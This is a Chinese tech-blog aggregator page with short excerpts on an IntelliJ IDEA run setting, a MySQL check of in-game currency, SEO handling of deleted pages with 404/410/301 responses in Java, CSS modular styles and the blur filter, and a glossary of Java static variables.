...担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 IntelliJ IDEA运行单个java类文件遇到一个问题,当前java类的main方法没有任何编译错误,执行run操作时编译器会把其他有编译错误的程序错误输出到控制台。导致这个正确的java类的main方法也运行不了。通过以下设置可以解决这个问题: 以IntelliJ IDEA 2021.2.2为例: 步骤一: 打开设置 搜索Java Compiler图中红色框选中eclipse,应用 步骤二: 在工具栏中打开Run,选择Edit Configurations 将Application的Modify Option展开,将Java的Do not build before run 勾选上即可 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_57542177/article/details/117825440。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-12-05 16:40:42
125
转载
MySQL
...过如下指令来检查更正是否成功: SELECT gold FROM role WHERE id=游戏角色标识符; 其中,游戏角色标识符为更正虚拟货币时使用的标识符。 总之,以上就是使用MySQL更正游戏角色虚拟货币的方法。当然,具体使用时需要根据实际情况进行调整,但基本思路是相同的。
2023-04-20 08:05:28
62
软件工程师
HTML
...一些积分制的方式衡量是否会惩罚站点,当你违反了条件1,-10分,违反了条件2,-15分....以此类推,当你的犯规分数达到一定的额度,可能就会采取惩罚。 搜索引擎的惩罚算法,我也不了解,只是举着个例子,就当安慰一下手误删除文章的站长! 3. 如何处理? 方法一:不能不管吧,至少得返回个友好的报错界面吧 如果页面返回的直接就是nginx的404,这......说不过去吧,说明站点做的不认真,容错比较差,搜索引擎和用户看了都会摇摇头。 所以,至少把“文章不存在”这种错误,封装一下,返回一个有好的界面,友好的提示用户“文章可能被作者删除了,看看其它文章吧!” 至少,在用户看来,这个提示是友好的,毕竟非技术人员看到nginx的404都会认为“呵,破网站,挂了!” 方法二:方法一是个错误,会引擎搜索引擎的反感 啥?你说了半天方法一,还是个错误? 尤其是你的被删的文章比较多的时候,搜索引擎每次来访,都会提取到文案“文章可能被作者删除了,看看其它文章吧!”,这... 第一,没什么价值,搜索引擎会认为低质量!这很严重 第二,更大的麻烦,这个文字是重复的,搜索引擎会认为你的站点有大量的重复!这很严重 方法三:正确的处理方法是返回404或410 404大家比较熟悉,410是啥,其实和404差不多: 但是二者在seo上的区别,当搜索引擎拿到410后,可能会更快地在索引库中删除被删除的文件。 当然,返回404和410在这里都可以。至少是老实承认问题的态度,让搜索引擎可以根据404或410做出正确的下一步操作。 java代码可以用这个返回404: response.setStatus(HttpServletResponse.SC_NOT_FOUND); 方法四:返回301状态码跳转到另一篇文章 301是跳转,永久性跳转,但这种跳转是被搜索引擎唯一接受、不认为是作弊的跳转。 不要使用302跳转、任何js跳转、meta刷新等方式,都会被搜索引擎认为是作弊哦! 所以,当文章不存在的时候,使用301跳转到另一篇文章(但最好主体相关的、或另起炉灶新写一篇弥补手误删除的错误),这样,有两个好处: 第一,搜索引擎不会惩罚 第二,会把老文章的权重301传到新文章,一举两得 java代码可以用这个返回301: // response.sendRedirect(getRandomArticleByCategoryHref(category)); // 这种是302 response.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY); // 这种是301,se唯一认可的非作弊的跳转方式 response.setHeader("Location",新路径); 方法五:死链提交 站长后台都支持死链提交,如果你确定一个url里面的文章确实被删除了,可以手动提交死链。主动承认链接问题。 下图是谷歌站长后台的入口:
2024-01-26 17:59:54
539
admin-tim
CSS
...模块为单位的样式编写方法,每个模块拥有自己独特的样式定义。但是,当多个模块的样式定义存在相同时,我们可能就需要运用多次引用的方式来防止冗余代码。 举个例子,我们设想一个简单的页面布局,其中包含有两个模块:头部模块和底部模块。我们可以将头部模块的样式写在一个CSS文件中,底部模块的样式写在另一个CSS文件中。然后,在引用这两个模块的HTML文件中,我们需要同时引用这两个CSS文件。 如下所示的是头部模块的样式代码: .header { height: 50px; background-color: 000; color: fff; text-align: center; } 下面是底部模块的样式代码: .footer { height: 80px; background-color: 4CAF50; color: fff; text-align: center; } 在HTML页面中,我们需要同时引用这两个模块的CSS文件: <head> <link rel="stylesheet" href="header.css"> <link rel="stylesheet" href="footer.css"> </head> 通过这种方式,我们就可以防止模块样式的多次引用问题。同时,如果我们需要修改样式,也只需要修改对应的CSS文件即可,不会影响到其他模块。 总之,CSS组件化的样式多次引用问题是一种常见的问题。但是,通过合理的CSS组件化编写方法和多次引用的方式,我们可以很方便地解决这个问题,从而提高CSS代码的可维护性和可读性。
2023-09-11 12:29:02
408
算法侠
CSS
...个用来调整模糊处理的变量,它用于在实施某种滤镜(Filter)的时候调整组件的模糊强度。在最新CSS中,我们可以运用“filter”属性通过设定各类的滤镜方法来达成这个效果。 filter: blur(5px); 其中blur方法就表示我们要为组件设定模糊处理,括号内的5px就是模糊范围,用来调整模糊的程度。数值越大,模糊的程度就越高。 需要注意的是,模糊范围不只可以用于图片的模糊处理,还可以用在文字、边框等组件上。比如我们可以为页面中的边框添加模糊处理: border: 2px solid 000; filter: blur(4px); 上面的代码就表示我们为组件的边框添加了一个宽度为2px、颜色为黑色、模糊范围为4px的模糊处理。 最后值得注意的是,由于最新CSS的滤镜属性并不是所有的浏览器都支持,因此我们在运用的时候需要特别注意兼容性问题。我们可以通过加上一些浏览器前缀来兼容各类的浏览器: filter: blur(5px); -webkit-filter: blur(5px);/ Safari和Chrome浏览器需要加上该前缀 / 总结:模糊范围是最新CSS中用来调整滤镜效果模糊强度的一个属性,可以用于图片、文字、边框等组件。在运用的时候需要注意兼容性问题,可以通过为不同浏览器加上前缀来解决。
2023-01-02 20:52:05
510
逻辑鬼才
Java
静态变量 , 在Java编程中,静态变量(或类变量)是一种与类关联的变量,而不是与类的实例关联。声明为static的关键字意味着无论创建多少个类的实例,该变量都只会存在一份,并且所有实例共享这同一个静态变量的值。例如,在文章中的\ Example\ 类中,静态变量\ x\ 就是所有\ Example\ 对象共享的一个变量。 访问修饰符 , 访问修饰符是Java语言中用于控制类、方法和变量访问权限的关键字,如public、private、protected等。在文章所描述的情境下,\ public\ 是一个访问修饰符,它允许任何其他类直接访问被其修饰的成员变量或方法,而无需通过类的实例。 成员变量 , 成员变量是在Java类中定义的变量,它们属于类的一部分,每个类的实例都会拥有自己的成员变量副本。在文章给出的代码示例中,“y”就是一个成员变量,对于“Example”类的每一个对象而言,都有一个独立的“y”的实例,其值可以独立于其他对象进行改变。 类级别的变量 , 类级别的变量即静态变量,它不属于任何类的特定实例,而是与整个类相关联。即使没有创建类的实例,也可以直接通过类名来访问这些变量。在文章的上下文中,类级别的变量“x”被static关键字修饰,因此可以通过“Example.x”形式在整个程序范围内被访问和修改。 公共访问 , 在Java编程语境中,公共访问是指一个类的成员变量或方法使用了public访问修饰符,这意味着它可以不受限制地从任何地方被访问到。这种开放的访问权限提高了代码复用性和灵活性,但同时也可能降低安全性,因为外部代码可以随意修改公共变量的值或调用公共方法。文章中提到的Example类的变量\ x\ 就具有公共访问性。
2023-11-01 22:07:27
368
程序媛
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
ifconfig 或 ip addr show
- 查看网络接口配置信息。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"